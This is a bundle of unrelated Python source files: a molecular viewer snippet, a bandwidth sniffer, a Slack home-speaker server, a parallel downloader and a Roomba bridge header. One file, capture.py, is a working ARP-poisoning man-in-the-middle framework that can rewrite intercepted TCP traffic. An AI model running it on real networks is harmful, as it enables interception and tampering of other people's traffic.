self.scene = hklscene
for i,radius in enumerate(hklscene.radii):
ftuple = (hklscene.points[i][0], hklscene.points[i][1], hklscene.points[i][2],
hklscene.colors[i][0], hklscene.colors[i][1], hklscene.colors[i][2], radius )
strdata += "%s,%s,%s,%s,%s,%s,%s," % roundoff(ftuple, 2)
strdata = strdata[:-1] # avoid the last comma
self.isinjected = True
self.msgqueue.append( ("InjectNewReflections", strdata) )
ngl_philstr = """
mouse_sensitivity = 0.2
.type = float
bin_opacities = ""
.type = str
tooltip_alpha = 0.85
.type = float
fixorientation = False
.type = bool
camera_type = *orthographic perspective
.type = choice
"""
NGLmaster_phil = libtbx.phil.parse( ngl_philstr )
NGLparams = NGLmaster_phil.fetch().extract()
def reset_NGLsettings():
"""
Reset NGL settings to their default values as specified in the phil definition string
"""
#global NGLmaster_phil
#global ngl_philstr
#global NGLparams
NGLparams = NGLmaster_phil.fetch(source = libtbx.phil.parse( ngl_philstr) ).extract()
def NGLsettings():
"""
Get a global phil parameters object containing some NGL settings
"""
#global NGLparams
return NGLparams
"""
# python2 code
from websocket_server import WebsocketServer
import threading, math
from time import sleep
nc = {}
def new_client(client, server):
nc = client
print "got a new client:", nc
def on_message(client, server, message):
print message
websocket.enableTrace(True)
server = WebsocketServer(7894, host='127.0.0.1')
server.set_fn_new_client(new_client)
server.set_fn_message_received(on_message)
wst = threading.Thread(target=server.run_forever)
wst.daemon = True
wst.start()
def LoopSendMessages():
x = 0.0
i=0
while server.clients:
nc = server.clients[0]
x += 0.2
alpha = (math.cos(x) +1.0 )/2.0
msg = u"alpha, 2, %f" %alpha
server.send_message(server.clients[0], msg )
r = (math.cos(x) +1.0 )/2.0
g = (math.cos(x+1) +1.0 )/2.0
b = (math.cos(x+2) +1.0 )/2.0
msg = u"colour, 1, %d, %f, %f, %f" %(i,r,g,b)
server.send_message(server.clients[0], msg )
sleep(0.2)
"""
"""
# python3 code
import asyncio
import math
import websockets
async def time(websocket, path):
x = 0
for i in range(1000):
x += 0.2
alpha = (math.cos(x) +1.0 )/2.0
msg = u"alpha, 2, %f" %alpha
await websocket.send( msg )
r = (math.cos(x) +1.0 )/2.0
g = (math.cos(x+1) +1.0 )/2.0
b = (math.cos(x+2) +1.0 )/2.0
msg = u"colour, 1, %d, %f, %f, %f" %(i,r,g,b)
await websocket.send( msg )
message = await websocket.recv()
print( message)
await asyncio.sleep(0.2)
start_server = websockets.serve(time, '127.0.0.1', 7894)
asyncio.get_event_loop().run_until_complete(start_server)
asyncio.get_event_loop().run_forever()
"""
|
network_analyzer.py
|
from scapy.all import *
import matplotlib.pyplot as plt
from binascii import hexlify
from threading import Thread
from datetime import datetime
import time
class Network_Analyzer:
def __init__(self, time, segment_len):
self.time = time
self.segment_len = segment_len
self.bws = []
self.ts = [0]
self.capture_thread= None
for i in range(0,int(time/self.segment_len)-1):
if len(self.ts) == 0:
continue
self.ts.append(self.ts[-1] + self.segment_len)
def capture(self, iface):
bw = []
print(f"Capturing traffic for {self.time}s")
f_time = datetime.now().timestamp()
packets = sniff(iface=iface, timeout=self.time)
f_time = 0 ## Timestamp of first packet
current_segment = 1
segment_load = 0
for packet in packets:
if f_time == 0:
f_time = packet.time
try:
packet[IP].src
except:
continue
if packet.time > f_time + current_segment*self.segment_len:
#New segment
segment_bw = ((segment_load*8)/self.segment_len)/1024
bw.append(segment_bw)
segment_load = 0
current_segment = current_segment + 1
#Calculate pauses if no packet was transmitted
if (packet.time - (f_time+current_segment*self.segment_len)) > (2* self.segment_len):
pause =int((packet.time - f_time-current_segment*self.segment_len)/self.segment_len)
print(pause)
for i in range(pause):
current_segment = current_segment + 1
bw.append(0)
segment_load = segment_load + len(packet)
self.bws.append(bw)
def run_capture_thread(self, ifce):
print("Running a capture thread")
self.capture_thread = threading.Thread(target=self.capture, args=(ifce,))
self.capture_thread.start()
pass
def join_capture_thread(self):
self.capture_thread.join()
#print(self.bws[0])
#print(self.ts)
print(f"{len(self.bws[0])} - {len(self.ts)}")
def plot(self, file_name=None):
plt.clf()
average = [0] * int((self.time/self.segment_len))
average_div = [0] * int((self.time/self.segment_len))
for bw in self.bws:
for i in range(0,len(self.ts)-len(bw)):
bw.append(0)
plt.plot(self.ts , bw, alpha=0.1)
for i in range(len(bw)):
average[i] = average[i] + bw[i]
average_div[i] = average_div[i] + 1
for i in range(len(average)):
try:
average[i] = average[i]/average_div[i]
except:
average[i] = 0
x = 0
for i in range(len(average)):
x = i
if average_div[i] == 0:
break
plt.plot(self.ts, average, "black")
print("Updating plots")
if file_name is None:
plt.title("Bandwidth")
plt.xlabel("time[s]")
plt.ylabel("bandwidth[Kbits/s]")
plt.ion()
plt.show()
plt.draw()
plt.pause(0.001)
else:
pass #Save figure
if __name__ == "__main__":
na = Network_Analyzer(30, 0.5)
try:
while True:
print("New sequence")
na.run_capture_thread("sw2-h2")
na.join_capture_thread()
na.plot()
time.sleep(20)
except KeyboardInterrupt:
print("Exiting")
'''
#packets = sniff(iface="s1-s2", timeout=100)
# Time length of segment
#segment_length = 1
#Bandwidth Array
bw = [0]
#Time array
ts = []
f_time = 0
segment_load = 0
segment_start_time = 10
for packet in packets:
if f_time == 0:
f_time = packet.time
segment_start_time = f_time
if packet.time > segment_start_time + segment_length:
#New segment
segment_bw = ((segment_load*8)/segment_length)/1024
print(segment_load*8)
print(segment_length)
print(segment_bw)
bw.append(segment_bw)
if (packet.time - segment_start_time) > (2* segment_length):
print(packet.time)
print(segment_start_time)
pause =int((packet.time - segment_start_time)/segment_length)
#pause = int(() / segment_length)
print(pause)
for i in range(pause):
bw.append(0)
segment_load = 0
segment_start_time = packet.time
segment_load = segment_load + len(packet)
ts = []
x = 0
for i in range(0,len(bw)):
ts.append(x)
x = x + segment_length
print(ts)
print(bw)
plt.plot(ts,bw)
plt.savefig('test.png')
'''
|
capture.py
|
# coding: utf-8
"""
Capture and manipulate traffic off the network.
This module provides a Sniffer class and a few "modules" which can be assembled to form attack tools.
These classes are based on Scapy and provide a convenient way to interact with and compose tools from it's functionality.
The advanced functions such as ARP poisonaing, packet forwarding, and analysis are decomposed into modules to allow
for greater flexibility and flexibility. Look at the constructed strategies for examples of how to compose the modules.
"""
import scapy.all as scapy
import enum
import net
import threading
import time
import socket
# Turn off print messages
scapy.conf.verb = 0
class Sniffer:
"""
Sniffer is the core component of the traffic capture framework.
This class uses the Scapy sniffer to collect packets off the wire. It then passes them to the modules for processing.
"""
def __init__(self, iface=None, processor=None, store=False, filter=None, quantum=0.25):
self.iface = iface
self.processor = processor
self.store = store
self.quantum = quantum
self.filter = filter
self.modules = []
self.packets = []
self._thread = None
self._l2socket = None
self._stopevent = threading.Event()
self._moduleslock = threading.RLock()
self._newmodules = []
def register(self, *mods):
with self._moduleslock:
self.modules.extend(mods)
self._newmodules.extend(mods)
def process(self, pkt):
with self._moduleslock:
for mod in self.modules:
if mod not in self._newmodules:
mod.process(pkt)
if self.processor is not None:
self.processor(pkt)
def run(self):
try:
self._l2socket = scapy.conf.L2listen(iface=self.iface, filter=self.filter)
while not self._stopevent.is_set():
with self._moduleslock:
while self._newmodules:
self._newmodules.pop().start(self)
pkts = self._l2socket.sniff(timeout=self.quantum, prn=self.process, store=self.store)
self.packets.extend(pkts)
finally:
with self._moduleslock:
for mod in self.modules:
mod.stop()
if self._l2socket is not None:
self._l2socket.close()
self._l2socket = None
def start(self):
self._stopevent.clear()
if self._thread is None or not self._thread.is_alive():
with self._moduleslock:
self._newmodules = list(self.modules)
self._thread = threading.Thread(target=self.run, daemon=True)
self._thread.start()
def join(self):
if self._thread is not None:
self._thread.join()
def stop(self):
self._stopevent.set()
def __enter__(self):
self.start()
return self
def __exit__(self, *args, **kwargs):
self.stop()
class Module:
"""
Module is the base for a packet sniffer module.
Implementaions of Module provide a discrete functionality towards complex packet analysis and manipulation.
"""
def start(self, sniffer):
"""
Start will be called when the sniffer starts
"""
pass
def process(self, pkt):
"""
Process will be called for every packet recieved by the sniffer
"""
pass
def stop(self):
"""
Stop will be called when the sniffer stops
"""
pass
class ArpCacheModule(Module):
"""
ArpCacheModule provides a cache of the ARP associations provided by other hosts.
It ignores ARP messages sent from this host and any other hosts specified in ``ignore``.
"""
def __init__(self, ignore=None):
self.sniffer = None
self.ignore = set() if ignore is None else set(ignore)
self.cache = {}
def start(self, sniffer):
self.sniffer = sniffer
if self.sniffer.iface is not None:
self.ignore.add(str(net.ifhwaddr(self.sniffer.iface)))
def process(self, pkt):
if scapy.Ether in pkt and scapy.ARP in pkt:
src = pkt[scapy.Ether].src
if src != '00:00:00:00:00:00' and src not in self.ignore:
psrc = pkt[scapy.ARP].psrc
if psrc != '0.0.0.0':
self.cache[psrc] = src
class ArpPoisonerModule(Module):
"""
ArpPoisonerModule will send out spoofed ARP messages at regular intervals to poison the network.
It also starts by sending out an arping to all targets to see who is on the network and populate the cache.
"""
def __init__(self, arpcache, iface=None, hwaddr=None, target=None, impersonate=None, interval=1):
self.arpcache = arpcache
self.iface = iface
self.interval = interval
self.hwaddr = hwaddr
self.target = target
self.impersonate = impersonate
self.sniffer = None
self._stopevent = threading.Event()
self._thread = None
@staticmethod
def enumerate(net):
if isinstance(net, str):
net = scapy.Net(net)
return net
def arping(self, target=None):
# Figure out who we are trying to resolve
if target is None:
if self.target is None or self.impersonate is None:
pdst = net.ifcidr(self.iface)
else:
# It has to be a list because scapy can be really cool, but also kinda wonky
pdst = list(set(self.enumerate(self.target)) | set(self.enumerate(self.target)))
else:
pdst = target
# Send out an arp "who-has" requests
pkts = scapy.Ether(src=self.hwaddr, dst='ff:ff:ff:ff:ff:ff')/scapy.ARP(op='who-has', hwsrc=self.hwaddr, pdst=pdst)
scapy.sendp(pkts, iface=self.iface)
def arpoison(self, target=None, impersonate=None):
# Chose the target and impersonation lists
impersonate = impersonate or self.impersonate or net.ifcidr(self.iface)
target = target or self.target or net.ifcidr(self.iface)
ifaddr = str(net.ifaddr(self.iface))
# Filter out targets and impersonations not in our ARP cache
pdst = [ip for ip in self.enumerate(target) if ip in self.arpcache]
psrc = [ip for ip in self.enumerate(impersonate) if ip in self.arpcache]
if pdst:
# Build the packet list and filter out packets that would be sent to the true ip owner
pkts = [scapy.Ether(src=self.hwaddr, dst=self.arpcache[ip])/scapy.ARP(op=['who-has', 'is-at'], hwsrc=self.hwaddr, psrc=psrc, pdst=ip) for ip in pdst]
pkts = [p for p in pkts if p.psrc != p.pdst and p.dst != ifaddr]
# Launch the payload
scapy.sendp(pkts, iface=self.iface)
def run(self):
if self.hwaddr is None:
self.hwaddr = str(net.ifhwaddr(self.iface))
self.arping()
while not self._stopevent.is_set():
self.arpoison()
time.sleep(self.interval)
def start(self, sniffer):
self._stopevent.clear()
self.sniffer = sniffer
if self.iface is None:
self.iface = self.sniffer.iface
if self._thread is None or not self._thread.is_alive():
self._thread = threading.Thread(target=self.run, daemon=True)
self._thread.start()
def stop(self):
self._stopevent.set()
class ForwarderModule(Module):
"""
ForwarderModule forwards packets received by the sniffer and in the ARP cache, after applying a filter.
This serves to forward on packets intercepted, such as by ARP poisoning, onto the intended hosts.
The filter function should return one packet, a list of packets, or None.
Returned packets will be sent after having their eithernet addresses set.
"""
def __init__(self, arpcache, filter=None, iface=None, hwaddr=None):
self.arpcache = arpcache
self.filter = filter
self.iface = iface
self.hwaddr = hwaddr
self.sniffer = None
def start(self, sniffer):
self.sniffer = sniffer
if self.iface is None:
self.iface = sniffer.iface
if self.hwaddr is None:
self.hwaddr = str(net.ifhwaddr(self.iface))
def process(self, pkt):
if scapy.IP in pkt and scapy.Ether in pkt:
if pkt[scapy.Ether].dst == self.hwaddr and pkt[scapy.Ether].src != self.hwaddr:
if pkt[scapy.IP].dst in self.arpcache:
pkt = pkt.copy()
pkt[scapy.Ether].dst = self.arpcache[pkt[scapy.IP].dst]
# After having patched the dst MAC, but before patching the src, apply the filter
if self.filter is not None:
pkt = self.filter(pkt)
if pkt is not None:
pkt[scapy.Ether].src = self.hwaddr
scapy.sendp(pkt, iface=self.iface)
class ArpMitmModule(Module):
def __init__(self, filter=None, iface=None, hwaddr=None):
self.cache = ArpCacheModule(ignore=[hwaddr])
self.poisoner = ArpPoisonerModule(self.cache.cache, iface=iface, hwaddr=hwaddr)
self.forwarder = ForwarderModule(self.cache.cache, filter=filter, iface=iface, hwaddr=hwaddr)
self.submodules = (self.cache, self.poisoner, self.forwarder)
self.sniffer = None
def start(self, sniffer):
self.sniffer = sniffer
for mod in self.submodules:
mod.start(sniffer)
def process(self, pkt):
for mod in self.submodules:
mod.process(pkt)
def stop(self):
for mod in self.submodules:
mod.stop()
class TcpFlags(enum.IntEnum):
FIN = 0x01
SYN = 0x02
RST = 0x04
PSH = 0x08
ACK = 0x10
URG = 0x20
ECE = 0x40
CWR = 0x80
class TcpFlowKey:
@classmethod
def frompkt(cls, pkt):
ip, tcp = pkt[scapy.IP], pkt[scapy.TCP]
return cls(ip.src, tcp.sport, ip.dst, tcp.dport)
def __init__(self, src, sport, dst, dport):
self.src = src
self.sport = sport
self.dst = dst
self.dport = dport
def inverse(self):
return self.__class__(self.dst, self.dport, self.src, self.sport)
def __hash__(self):
return hash((self.src, self.sport, self.dst, self.dport))
def __eq__(self, other):
return all((
isinstance(other, self.__class__),
self.src == other.src,
self.sport == other.sport,
self.dst == other.dst,
self.dport == other.dport
))
class TcpFilter:
"""
TcpFilter wraps a packet filter and adjusts seq and ack numbers to account for altered data lengths
The wrapped filter should not change the seq or ack number, as they wil be reset
The wrapped filter may drop a packet by returning None in which case nothing will be forwarded
"""
def __init__(self, filter=None):
if filter is not None:
self.filter = filter
self.offsets = {}
class Offset:
def __init__(self):
self.list = []
def getseq(self, seq):
offset = 0
for curr in self.list:
if curr[0] < seq:
offset += curr[1]
else:
break
return seq + offset
def getack(self, ack):
for curr in self.list:
if curr[0] < ack:
ack -= curr[1]
else:
break
return ack
def add(self, seq, diff):
"""Add a new entry to the list to account for diff bytes added at seq"""
# Insert into sorted list using linear search because it will almost always be the front
new = (seq, diff)
for i, curr in enumerate(reversed(self.list)):
if new > curr:
self.list.insert(len(self.list) - i, new)
break
else:
self.list.insert(0, new)
def filter(self, pkt):
"""filter should be overriden if TcpFilter is subclassed"""
return pkt
def __call__(self, pkt):
if all(layer in pkt for layer in (scapy.Ether, scapy.IP, scapy.TCP)):
seq, ack = pkt[scapy.TCP].seq, pkt[scapy.TCP].ack
key = TcpFlowKey.frompkt(pkt)
if pkt[scapy.TCP].flags & TcpFlags.SYN or key not in self.offsets:
self.offsets[key] = self.Offset()
offset = self.offsets[key]
before = len(pkt[scapy.Raw].load) if scapy.Raw in pkt else 0
pkt = self.filter(pkt)
if pkt is None:
# The packet, and its data, was dropped
offset.add(seq, -before)
else:
after = len(pkt[scapy.Raw].load) if scapy.Raw in pkt else 0
diff = after - before
if diff != 0:
offset.add(seq, diff)
pkt[scapy.TCP].seq = offset.getseq(seq)
inverse_key = key.inverse()
if pkt[scapy.TCP].flags & TcpFlags.ACK and inverse_key in self.offsets:
pkt[scapy.TCP].ack = self.offsets[inverse_key].getack(ack)
# Force checksum recalculation
pkt[scapy.IP].len += diff
del pkt[scapy.TCP].chksum
del pkt[scapy.IP].chksum
return pkt
def tcpfilter(filter):
return TcpFilter(filter)
|
multithread.py
|
from threading import Thread
from time import sleep
from cyberpass import login
import cStringIO,StringIO, re
import urllib2, os, urllib
import os
import pycurl
import time
def jo():
thread1.join()
thread2.join()
thread3.join()
thread4.join()
thread5.join()
thread6.join()
def download(ip,url,filename,ranges,rangef):
print "==> Downloading File: ",filename," URL: ",url
fp = open(filename, "wb")
curl = pycurl.Curl()
curl.setopt(pycurl.URL, url)
curl.setopt(pycurl.NOSIGNAL, 1)
curl.setopt(pycurl.NOPROGRESS, 0)
curl.setopt(pycurl.PROGRESSFUNCTION, progress)
curl.setopt(pycurl.WRITEDATA, fp)
curl.setopt(pycurl.INTERFACE, ip)
curl.setopt(pycurl.RANGE, ranges+'-'+rangef)
curl.setopt(curl.NOPROGRESS, 0)
curl.setopt(curl.PROGRESSFUNCTION, progress)
curl.perform()
m = {}
m['effective-url'] = curl.getinfo(pycurl.EFFECTIVE_URL)
m['http-code'] = curl.getinfo(pycurl.HTTP_CODE)
m['total-time'] = curl.getinfo(pycurl.TOTAL_TIME)
m['namelookup-time'] = curl.getinfo(pycurl.NAMELOOKUP_TIME)
m['connect-time'] = curl.getinfo(pycurl.CONNECT_TIME)
m['pretransfer-time'] = curl.getinfo(pycurl.PRETRANSFER_TIME)
m['redirect-time'] = curl.getinfo(pycurl.REDIRECT_TIME)
m['redirect-count'] = curl.getinfo(pycurl.REDIRECT_COUNT)
m['size-upload'] = curl.getinfo(pycurl.SIZE_UPLOAD)
m['size-download'] = curl.getinfo(pycurl.SIZE_DOWNLOAD)
m['speed-upload'] = curl.getinfo(pycurl.SPEED_UPLOAD)
m['header-size'] = curl.getinfo(pycurl.HEADER_SIZE)
m['request-size'] = curl.getinfo(pycurl.REQUEST_SIZE)
m['content-length-download'] = curl.getinfo(pycurl.CONTENT_LENGTH_DOWNLOAD)
m['content-length-upload'] = curl.getinfo(pycurl.CONTENT_LENGTH_UPLOAD)
m['content-type'] = curl.getinfo(pycurl.CONTENT_TYPE)
m['response-code'] = curl.getinfo(pycurl.RESPONSE_CODE)
m['speed-download'] = curl.getinfo(pycurl.SPEED_DOWNLOAD)
m['ssl-verifyresult'] = curl.getinfo(pycurl.SSL_VERIFYRESULT)
m['filetime'] = curl.getinfo(pycurl.INFO_FILETIME)
m['starttransfer-time'] = curl.getinfo(pycurl.STARTTRANSFER_TIME)
m['redirect-time'] = curl.getinfo(pycurl.REDIRECT_TIME)
m['redirect-count'] = curl.getinfo(pycurl.REDIRECT_COUNT)
m['http-connectcode'] = curl.getinfo(pycurl.HTTP_CONNECTCODE)
m['httpauth-avail'] = curl.getinfo(pycurl.HTTPAUTH_AVAIL)
m['proxyauth-avail'] = curl.getinfo(pycurl.PROXYAUTH_AVAIL)
m['os-errno'] = curl.getinfo(pycurl.OS_ERRNO)
m['num-connects'] = curl.getinfo(pycurl.NUM_CONNECTS)
m['ssl-engines'] = curl.getinfo(pycurl.SSL_ENGINES)
m['cookielist'] = curl.getinfo(pycurl.INFO_COOKIELIST)
m['lastsocket'] = curl.getinfo(pycurl.LASTSOCKET)
m['ftp-entry-path'] = curl.getinfo(pycurl.FTP_ENTRY_PATH)
print m
curl.close()
fp.close()
def progress(download_t, download_d, upload_t, upload_d):
print "Total to download", download_t
print "Total downloaded", download_d
if __name__ == "__main__":
link = "http://av.vimeo.com/88785/872/43263156.mp4?token=1380857094_352ec82d2d18242330104b3b12de4c5e"
url= link
response = 'http://sushruth.bits-goa.com/cyberboost.php?url='+ url
result = urllib2.urlopen(response)
html = result.read()
filesize = html.split('Content-Length: ')[1]
filesize = filesize.split('\n')[0]
print filesize
length= filesize
filename = link.split('?')[0]
filename = filename.split('/')[-1]
print filename
i=1
thread1= Thread(target = download, args=["10.3.8.21"+str(i+2),url,filename+str(i)+".dat", "0", str(int(((int(length)/6))*i))])
i=i+1
thread2= Thread(target = download, args=["10.3.8.21"+str(i+2),url,filename+str(i)+".dat", str(int(((int(length)/6)*(i-1)))+1), str(int(((int(length)/6))*i))])
i=i+1
thread3=Thread(target = download, args=["10.3.8.21"+str(i+2),url,filename+str(i)+".dat", str(int(((int(length)/6)*(i-1)))+1), str(int(((int(length)/6))*i))])
i=i+1
thread4= Thread(target = download, args=["10.3.8.21"+str(i+2),url,filename+str(i)+".dat", str(int(((int(length)/6)*(i-1)))+1), str(int(((int(length)/6))*i))])
i=i+1
thread5=Thread(target = download, args=["10.3.8.21"+str(i+2),url,filename+str(i)+".dat", str(int(((int(length)/6)*(i-1)))+1), str(int(((int(length)/6))*i))])
i=i+1
thread6= Thread(target = download, args=["10.3.8.21"+str(i+2),url,filename+str(i)+".dat", str(int(((int(length)/6)*(i-1)))+1), str(length)])
thread1.start()
#time.sleep(5)
thread2.start()
#time.sleep(5)
thread3.start()
#time.sleep(5)
thread4.start()
#time.sleep(5)
thread5.start()
#time.sleep(5)
thread6.start()
#time.sleep(5)
jo()
print "thread finished...exiting"
file = open(filename, 'ab')
for i in range(1,7) :
file2 = open(filename+str(i)+'.dat', 'rb')
file.write(file2.read())
file2.close()
file.close()
|
myhome.py
|
# coding: utf-8
import uvicorn
import os, subprocess, shlex, asyncio, json
from dotenv import load_dotenv
from src.aquestalk_util import romajiToKana
import threading
from fastapi import FastAPI
from starlette.requests import Request
import requests
from pydantic import BaseModel
from fastapi.encoders import jsonable_encoder
load_dotenv()
SLACK_BOT_TOKEN = os.environ["SLACK_BOT_TOKEN"]
SLACK_SPEAKER_CHANNEL_TOKEN = os.environ["SLACK_SPEAKER_CHANNEL_TOKEN"]
APP_HOME_VIEW = {
"type": "home",
"blocks": [
{
"type": "section",
"text": {
"type": "mrkdwn",
"text": "ようこそ!ここはHomeSpeakerのApp Homeです."
}
},
{
"type": "divider"
},
{
"type": "section",
"text": {
"type": "mrkdwn",
"text": "*使用可能なコマンド*"
}
},
{
"type": "section",
"text": {
"type": "mrkdwn",
"text": "`/say [メッセージ]`: メッセージを伝えるとき"
}
},
{
"type": "section",
"text": {
"type": "mrkdwn",
"text": "`/go [地名]`: 家に帰るとき"
}
}
]
}
app = FastAPI()
print("Start server...")
class SlackCommand(BaseModel):
token: str
team_id: str
team_domain: str
channel_id: str
channel_name: str
user_id: str
user_name: str
command: str
text: str
response_url: str
trigger_id: str
api_app_id: str
# post response to Slack App Home
def viewsPublish(user: str, view):
url = "https://slack.com/api/views.publish"
payload = {"token": SLACK_BOT_TOKEN, "user_id": user, "view": view}
headers = {"Content-type": "application/json; charset=UTF-8", "Authorization": "Bearer " + SLACK_BOT_TOKEN}
r = requests.post(url, data=json.dumps(payload), headers=headers)
# post response to Slack channel
def postSpeakerChannel(message: str):
url = SLACK_SPEAKER_CHANNEL_TOKEN
payload = {"text": message}
r = requests.post(url, data=json.dumps(payload))
def makePostText(cmdName: str):
return cmdName + "リクエストを受け付けました"
# speaker
def say(msg, symbol=True):
speed = "100"
if symbol: #音声記号列での発話の有無(デフォルト:有)
cmd1 = "AquesTalkPi -s " + speed + " -k \"" + msg + "\""
else:
cmd1 = "AquesTalkPi -s " + speed + " \"" + msg + "\""
cmd2 = "aplay -D plughw:1,0"
process1=subprocess.Popen(shlex.split(cmd1),stdout=subprocess.PIPE)
process2=subprocess.Popen(shlex.split(cmd2),stdin=process1.stdout)
process2.wait()
def aplay(wavfile):
cmd = "aplay -D plughw:1,0 " + wavfile
proc = subprocess.call( cmd.strip().split(" ") )
# gohome
def sayGohome(userName: str, location: str):
sentence1 = "い'まから,/;" + romajiToKana(userName) + "さんがか'えってきま_ス."
sentence2 = "ただ'いま、" + location + "にいま_ス."
aplay("res/notice.wav")
say(sentence1)
if len(location) > 0:
say(sentence2)
def makeGohomeText(userName: str, location: str):
message = f"いまからかえります"
if len(location) > 0:
message += f" @{location}"
message += f" from {userName}"
return message
# say
def saySomething(userName: str, message: str):
sentence = romajiToKana(userName) + "さん,からのめっせーじです."
sentence += message
aplay("res/notice.wav")
say(sentence, False)
def makeSayText(userName: str, text: str):
message = f"{userName}さんからのメッセージ:\n"
message += text
return message
# post request
@app.post("/myhome/api/v1/gohome",
status_code=200)
async def gohome_cmd(req: Request):
body = await req.form()
cmd = SlackCommand(**body)
postThread = threading.Thread(target=postSpeakerChannel(makeGohomeText(cmd.user_name, cmd.text)))
sayThread = threading.Thread(target=sayGohome(cmd.user_name, cmd.text))
postThread.start()
sayThread.start()
return {"text": makePostText("gohome")}
@app.post("/myhome/api/v1/say",
status_code=200)
async def say_cmd(req: Request):
body = await req.form()
cmd = SlackCommand(**body)
postThread = threading.Thread(target=postSpeakerChannel(makeSayText(cmd.user_name, cmd.text)))
sayThread = threading.Thread(target=saySomething(cmd.user_name, cmd.text))
postThread.start()
sayThread.start()
return {"text": makePostText("say")}
@app.post("/myhome/api/v1/apphome",
status_code=200)
async def get_apphome(req: Request):
body = await req.json()
type = body["type"]
if type == "url_verification":
return {"challenge": body["challenge"]}
if type == "event_callback":
event = body["event"]
if (event["type"] == "app_home_opened"):
viewsPublish(event["user"], APP_HOME_VIEW)
@app.post("/myhome/api/v1/actions",
status_code=200)
async def actions(req: Request):
body = await req.form()
print(body["payload"])
patload = body["payload"]
"""
if __name__ == "__main__":
uvicorn.run(app, host="0.0.0.0", port=13241)
"""
|
roomba.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
Python 2.7/Python 3.5/3.6 (thanks to pschmitt for adding Python 3 compatibility)
Program to connect to Roomba 980 vacuum cleaner, dcode json, and forward to mqtt
server
Nick Waterton 24th April 2017: V 1.0: Initial Release
Nick Waterton 4th July 2017 V 1.1.1: Fixed MQTT protocol version, and map
paths, fixed paho-mqtt tls changes
Nick Waterton 5th July 2017 V 1.1.2: Minor fixes, CV version 3 .2 support
Nick Waterton 7th July 2017 V1.2.0: Added -o option "roomOutline" allows
enabling/disabling of room outline drawing, added auto creation of css/html files
Nick Waterton 11th July 2017 V1.2.1: Quick (untested) fix for room outlines
if you don't have OpenCV
Nick Waterton 3rd Feb 2018 V1.2.2: Quick (untested) fix for running directly (ie not installed)
Nick Waterton 12th April 2018 V1.2.3: Fixed image rotation bug causing distorted maps if map rotation was not 0.
Nick Waterton 21st Dec 2018 V1.2.4: Fixed problem with findContours with OpenCV V4. Note V4.0.0-alpha still returns 3 values, and so won't work.
Nick Wateton 7th Oct 2019 V1.2.5: changed PROTOCOL_TLSv1 to PROTOCOL_TLS to fix i7 connection problem after F/W upgrade.
Nick Waterton 12th Nov 2019 V1.2.6: added set_ciphers('DEFAULT@SECLEVEL=1') to ssl context to work arounf dh_key_too_small error.
Nick Waterton 14th Jan 2020 V1.2.7: updated error code list.
'''
from __future__ import print_function
from __future__ import absolute_import
__version__ = "1.2.7"
from ast import literal_eval
from collections import OrderedDict, Mapping
try:
from roomba.password import Password
except ImportError:
from password import Password
import datetime
import json
import math
import logging
import os
import six
import socket
import ssl
import sys
import threading
import time
import traceback
try:
import configparser
except:
from six.moves import configparser
# Import trickery
global HAVE_CV2
global HAVE_MQTT
global HAVE_PIL
HAVE_CV2 = False
HAVE_MQTT = False
HAVE_PIL = False
try:
import paho.mqtt.client as mqtt
HAVE_MQTT = True
except ImportError:
print("paho mqtt client not found")
try:
import cv2
import numpy as np
HAVE_CV2 = True
except ImportError:
print("CV or numpy module not found, falling back to PIL")
# NOTE: MUST use Pillow Pillow 4.1.1 or above to avoid some horrible memory leaks in the
# text handling!
try:
from PIL import Image, ImageDraw, ImageFont, ImageFilter, ImageOps
HAVE_PIL = True
except ImportError:
print("PIL module not found, maps are disabled")
# On Python 3 raw_input was renamed to input
try:
input = raw_input
except NameError:
pass
class Roomba(object):
'''
This is a Class for Roomba 900 series WiFi connected Vacuum cleaners
Requires firmware version 2.0 and above (not V1.0). Tested with Roomba 980
username (blid) and password are required, and can be found using the
password() class above (or can be auto discovered)
Most of the underlying info was obtained from here:
https://github.com/koalazak/dorita980 many thanks!
The values received from the Roomba as stored in a dictionay called
master_state, and can be accessed at any time, the contents are live, and
will build with time after connection.
This is not needed if the forward to mqtt option is used, as the events will
be decoded and published on the designated mqtt client topic.
'''
VERSION = "1.1"
states = {"charge": "Charging",
"new": "New Mission",
"run": "Running",
"resume": "Running",
"hmMidMsn": "Recharging",
"recharge": "Recharging",
"stuck": "Stuck",
"hmUsrDock": "User Docking",
"dock": "Docking",
"dockend": "Docking - End Mission",
"cancelled": "Cancelled",
"stop": "Stopped",
"pause": "Paused",
"hmPostMsn": "End Mission",
"": None}
# From http://homesupport.irobot.com/app/answers/detail/a_id/9024/~/roomba-900-error-messages
_ErrorMessages_old = {
0: "None",
1: "Roomba is stuck with its left or right wheel hanging down.",
2: "The debris extractors can't turn.",
5: "The left or right wheel is stuck.",
6: "The cliff sensors are dirty, it is hanging over a drop, "\
"or it is stuck on a dark surface.",
8: "The fan is stuck or its filter is clogged.",
9: "The bumper is stuck, or the bumper sensor is dirty.",
10: "The left or right wheel is not moving.",
11: "Roomba has an internal error.",
14: "The bin has a bad connection to the robot.",
15: "Roomba has an internal error.",
16: "Roomba has started while moving or at an angle, or was bumped "\
"while running.",
17: "The cleaning job is incomplete.",
18: "Roomba cannot return to the Home Base or starting position."
}
# from decoding app
_ErrorMessages = {
0: "None",
1: "Left wheel off floor",
2: "Main Brushes stuck",
3: "Right wheel off floor",
4: "Left wheel stuck",
5: "Right wheel stuck",
6: "Stuck near a cliff",
7: "Left wheel error",
8: "Bin error",
9: "Bumper stuck",
10: "Right wheel error",
11: "Bin error",
12: "Cliff sensor issue",
13: "Both wheels off floor",
14: "Bin missing",
15: "Reboot required",
16: "Bumped unexpectedly",
17: "Path blocked",
18: "Docking issue"
19: "Undocking issue",
20: "Docking issue",
21: "Navigation problem",
22: "Navigation problem",
23: "Battery issue",
24: "Navigation problem",
25: "Reboot required",
26: "Vacuum problem",
27: "Vacuum problem",
29: "Software update needed",
30: "Vacuum problem",
31: "Reboot required",
32: "Smart map problem",
33: "Path blocked",
34: "Reboot required",
35: "Unrecognised cleaning pad",
36: "Bin full",
37: "Tank needed refilling",
38: "Vacuum problem",
39: "Reboot required",
40: "Navigation problem",
41: "Timed out",
42: "Localization problem",
43: "Navigation problem",
44: "Pump issue",
45: "Lid open",
46: "Low battery",
47: "Reboot required",
48: "Path blocked",
52: "Pad required attention",
65: "Hardware problem detected",
66: "Low memory",
68: "Hardware problem detected",
73: "Pad type changed",
74: "Max area reached",
75: "Navigation problem",
76: "Hardware problem detected"
}
def __init__(self, address=None, blid=None, password=None, topic="#",
continuous=True, clean=False, cert_name="", roombaName="",
file="./config.ini"):
